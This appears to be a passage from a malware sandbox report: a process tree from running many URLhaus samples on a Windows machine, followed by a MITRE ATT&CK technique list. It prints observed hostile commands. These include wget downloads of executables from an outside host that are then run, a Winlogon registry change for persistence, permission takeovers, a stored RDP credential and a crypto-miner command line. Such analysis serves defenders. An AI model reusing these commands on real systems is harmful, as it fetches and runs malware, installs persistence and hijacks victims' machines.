        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
        6⤵
        
        PID:2332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2960
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:2
        6⤵
        
        PID:4936
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2372 /prefetch:2
        6⤵
        
        PID:1788
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2360 /prefetch:2
        6⤵
        
        PID:804
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3980 /prefetch:2
        6⤵
        
        PID:3036
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4032 /prefetch:2
        6⤵
        
        PID:4788
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4396
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4900
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJJJDAAECGHD" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5952
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6008
  - - C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
      4⤵
      Executes dropped EXE
      PID:3056
  - - C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3116
  - - C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1704
  - - C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1208
  - - C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:392
  - - C:\Users\Admin\Downloads\UrlHausFiles\unik.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1500
        5⤵
        Program crash
        
        PID:5268
  - - C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:864
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        5⤵
        
        PID:2292
  - - C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
      4⤵
      Executes dropped EXE
      PID:5736
  - - C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
      4⤵
      Executes dropped EXE
      PID:5388
  - - C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:5588
  - - C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5816
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 568
        5⤵
        Program crash
        
        PID:6016
  - - C:\Users\Admin\Downloads\UrlHausFiles\build.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\build.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4824
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\KFHJJJKKFHID" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3520
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5124
  - - C:\Users\Admin\Downloads\UrlHausFiles\shell.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5824
  - - C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6128
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2960
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5224
  - - C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3704
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D6B.tmp\6D6C.tmp\6D6D.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
        5⤵
        
        PID:2832
      - C:\Windows\system32\cmdkey.exe
        
        cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
        6⤵
        
        PID:4240
      - C:\Windows\system32\mstsc.exe
        
        mstsc /v: 211.168.94.177
        6⤵
        Enumerates connected drives
        Checks SCSI registry key(s)
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3192
      - C:\Windows\system32\cmdkey.exe
        
        cmdkey /delete: 211.168.94.177
        6⤵
        
        PID:5128
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:4808
  - - C:\Users\Admin\Downloads\UrlHausFiles\boot.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
      4⤵
      Executes dropped EXE
      PID:5264
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7153.tmp\7154.tmp\7155.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
        5⤵
        
        PID:5400
      - C:\Windows\explorer.exe
        
        explorer.exe
        6⤵
        Modifies registry class
        
        PID:3544
      - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"
        6⤵
        Executes dropped EXE
        
        PID:5752
      - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"
        6⤵
        Executes dropped EXE
        
        PID:3616
      - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"
        6⤵
        Executes dropped EXE
        
        PID:3168
      - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"
        6⤵
        Executes dropped EXE
        
        PID:2388
      - C:\Users\Admin\AppData\Roaming\run.exe
        
        run.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5924
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D26E.tmp\D26F.tmp\D270.bat C:\Users\Admin\AppData\Roaming\run.exe"
        7⤵
        
        PID:5232
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2372
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5572
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4704
        
        C:\Windows\system32\attrib.exe
        
        attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"
        8⤵
        Views/modifies file attributes
        
        PID:5680
        
        C:\Windows\system32\attrib.exe
        
        attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"
        8⤵
        Views/modifies file attributes
        
        PID:2472
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5852
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F
        8⤵
        
        PID:5488
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F
        8⤵
        
        PID:1452
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F
        8⤵
        
        PID:5728
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "Fix Getting Devices" /F
        8⤵
        
        PID:5556
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "Windows Optimize" /F
        8⤵
        
        PID:340
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "ChangeWallpaper" /F
        8⤵
        
        PID:2356
      - C:\Users\Admin\AppData\Roaming\run2.exe
        
        run2.exe
        6⤵
        Executes dropped EXE
        
        PID:6076
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D608.tmp\D609.tmp\D60A.bat C:\Users\Admin\AppData\Roaming\run2.exe"
        7⤵
        Drops file in System32 directory
        
        PID:5084
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/wallx.exe" -O "wallx.exe"
        8⤵
        Executes dropped EXE
        
        PID:5916
        
        C:\Users\Admin\AppData\Roaming\wallx.exe
        
        wallx.exe
        8⤵
        Executes dropped EXE
        
        PID:1092
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE62.tmp\EE63.tmp\EE64.bat C:\Users\Admin\AppData\Roaming\wallx.exe"
        9⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Roaming\WallpaperX.exe
        
        WallpaperX.exe
        10⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:4708
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/boot.exe" -O "boot.exe"
        8⤵
        Executes dropped EXE
        
        PID:236
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/FixCSM.exe" -O "FixCSM.exe"
        8⤵
        Executes dropped EXE
        
        PID:564
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/del.exe" -O "C:\Windows\System32\del.exe"
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5660
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/Coc Coc XG.exe" -O "Coc Coc XG.exe"
        8⤵
        Executes dropped EXE
        
        PID:4712
        
        C:\Windows\system32\takeown.exe
        
        takeown /F "C:\windows\system32\userinit.exe"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:640
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\windows\system32\userinit.exe" /grant administrators:F
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4512
        
        C:\FixCSM.exe
        
        C:\FixCSM.exe
        8⤵
        Executes dropped EXE
        
        PID:5676
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4ABB.tmp\4ACC.tmp\4ACD.bat C:\FixCSM.exe"
        9⤵
        
        PID:5904
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\boot.exe,C:\Program Files (x86)\CSMClient\CyberStation.exe," /f
        10⤵
        Modifies WinLogon for persistence
        
        PID:2976
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 10
        8⤵
        Delays execution with timeout.exe
        
        PID:5432
        
        C:\Windows\System32\del.exe
        
        C:\Windows\System32\del.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6104
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F5A.tmp\6F5B.tmp\6F5C.bat C:\Windows\System32\del.exe"
        9⤵
        
        PID:5624
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 5
        10⤵
        Delays execution with timeout.exe
        
        PID:5944
        
        C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Administrator\AppData\Roaming\config.txt"
        8⤵
        Views/modifies file attributes
        
        PID:1880
        
        C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Administrator\AppData\Roaming\log.txt"
        8⤵
        Views/modifies file attributes
        
        PID:2292
  - - C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SendNotifyMessage
      PID:5780
  - - C:\Users\Admin\Downloads\UrlHausFiles\me.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\me.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2332
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\..\360Downloads\Pester.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5336
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 4 127.0.0.1
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1748
  - - C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5888
  - - C:\Users\Admin\Downloads\UrlHausFiles\wow.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2856
  - - C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1844
  - - C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5864
  - - C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
      "C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SendNotifyMessage
      PID:5496
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\UrlHausFiles\urlhaus_urls.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3544
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5640
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Drops startup file
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5392
- C:\Users\Admin\Desktop\Coc Coc.exe
  "C:\Users\Admin\Desktop\Coc Coc.exe"
  2⤵
  - Executes dropped EXE
  PID:4440
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E45.tmp\4E46.tmp\4E47.bat "C:\Users\Admin\Desktop\Coc Coc.exe""
    3⤵
    - Drops file in Program Files directory
    PID:1708
  - - C:\Users\Admin\AppData\Roaming\portable_util.exe
      portable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3516
    - - C:\Users\Admin\AppData\Roaming\setup.exe
        
        "C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4476
      - C:\Users\Admin\AppData\Roaming\setup.exe
        
        C:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x334,0x338,0x33c,0x314,0x340,0x7c8088,0x7c8098,0x7c80a4
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4912 -ip 4912
1⤵
PID:3132

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4744

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5816 -ip 5816
1⤵
PID:5920

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4936 -ip 4936
1⤵
PID:3544

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:5264

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
- Modifies registry class
PID:5112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Authentication Process

Modify Registry

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion